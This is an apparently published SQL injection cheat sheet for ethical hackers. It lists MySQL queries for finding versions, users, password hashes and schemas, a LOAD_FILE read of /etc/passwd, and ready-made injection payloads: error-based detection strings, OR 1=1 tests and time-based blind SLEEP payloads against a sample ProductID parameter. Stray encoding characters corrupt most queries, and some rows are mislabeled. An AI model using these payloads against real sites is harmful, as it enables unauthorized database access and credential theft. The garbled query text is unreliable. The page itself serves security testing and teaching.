SQL Injection Cheat Sheet
Last Updated :
07 Jun, 2023
SQL injection is a common vulnerability in web applications that can be exploited to inject malicious SQL code into a database. An attacker who knows the correct syntax for injecting SQL commands into an application’s back end could use this to execute unauthorized or destructive actions on behalf of the target user. An ethical hacker should always test for and identify potential SQL injection vulnerabilities, as they are one of the most frequently used attacks in today’s digital world.
The whole purpose of the Cheat Sheet is to provide you with some quick, accurate ready-to-use commands and necessary Sqlmap queries to help you with SQL Injections.
Basics of SQL:
S. No.
|
Parameters
|
SQL Queries/Examples
|
1.
|
Version
|
SELECT @@version;
|
2.
|
Comments
|
/ / or #
|
3.
|
Current user
|
SELECT user(); || SELECT systemÂ_user()
|
4.
|
List users
|
SELECT user FROM mysql.uÂser;
|
5.
|
List password hashes
|
SELECT host, user, password FROM mysql.uÂser;
|
6.
|
Current Database
|
SELECT database()
|
7.
|
List databases
|
SELECT schemaÂ_name FROM informÂatiÂon_ÂschÂema.scÂhemata; || SELECT distinÂct(db) FROM mysql.db
|
8.
|
List tables
|
SELECT table_ÂschÂemaÂ,taÂbleÂ_name FROM informÂatiÂon_ÂschÂema.tables WHERE table_Âschema != ‘mysql’ AND table_Âschema != ‘inforÂmatÂionÂ_scÂhema’
|
9.
|
List columns
|
SELECT table_Âschema, table_Âname, columnÂ_name FROM informÂatiÂon_ÂschÂema.coÂlumns WHERE table_Âschema != ‘mysql’ AND table_Âschema != ‘inforÂmatÂionÂ_scÂhema’
|
10.
|
Find Tables From Column Name
|
SELECT table_Âschema, table_name FROM informÂatiÂon_ÂschÂema.coÂlumns WHERE columnÂ_name = ‘usernÂame’;
|
11.
|
Time delay
|
SELECT BENCHMÂARKÂ(10Â000Â00,ÂMD5Â(‘A’)); SELECT SLEEP(5); # >= 5.0.12
|
12.
|
Local File Access
|
UNION ALL SELECT LOAD_FÂILEÂ(‘/ÂetcÂ/paÂsswd’)
|
13.
|
HostnaÂme/IP Address
|
SELECT @@hostÂname;
|
14.
|
Create user
|
CREATE USER test1 IDENTIFIED BY ‘pass1′;
|
15.
|
Delete user Location of the db file
|
SELECT @@datadir;
|
Basic Commands of SQLMap:
Manually Attacks on SQLMap:
S. No. |
Manually Attack Parameters |
SQLMap Queries/Examples |
1. |
Quick detect INTEGERS |
select 1 and row(1,Â1)>Â(select count(),concÂat(ÂCONÂCATÂ(@@ÂVERÂSIOÂN),Â0x3Âa,fÂlooÂr(rÂand()2))x from (select 1 union select 2)a group by x limit 1)) |
2. |
Quick detect STRINGS |
‘+(select 1 and row(1,Â1)>Â(select count(),concÂat(ÂCONÂCATÂ(@@ÂVERÂSIOÂN),Â0x3Âa,fÂlooÂr(rÂand()2))x from (select 1 union select 2)a group by x limit 1))+’ |
3. |
Clear SQL Test |
producÂt.pÂhp?id=4 producÂt.pÂhp?Âid=5-1 producÂt.pÂhp?id=4 OR 1=1 producÂt.pÂhp?Âid=-1 OR 17-7=10 |
4. |
Blind SQL Injection |
SLEEP(Â25)– SELECT BENCHMÂARKÂ(10Â000Â00,ÂMD5Â(‘A’)); |
5. |
Real world sample |
ProducÂtID=1 OR SLEEP(Â25)=0 LIMIT 1– ProducÂtID=1) OR SLEEP(Â25)=0 LIMIT 1– ProducÂtID=1′ OR SLEEP(Â25)=0 LIMIT 1– ProducÂtID=1′) OR SLEEP(Â25)=0 LIMIT 1– ProducÂtID=1)) OR SLEEP(Â25)=0 LIMIT 1– ProducÂtIDÂ=SELECT SLEEP(Â25)– |
You can also learn more about SQL Injections from the article: How to use SQLMAP to test a website for SQL Injection vulnerability.
Share your thoughts in the comments
Please Login to comment...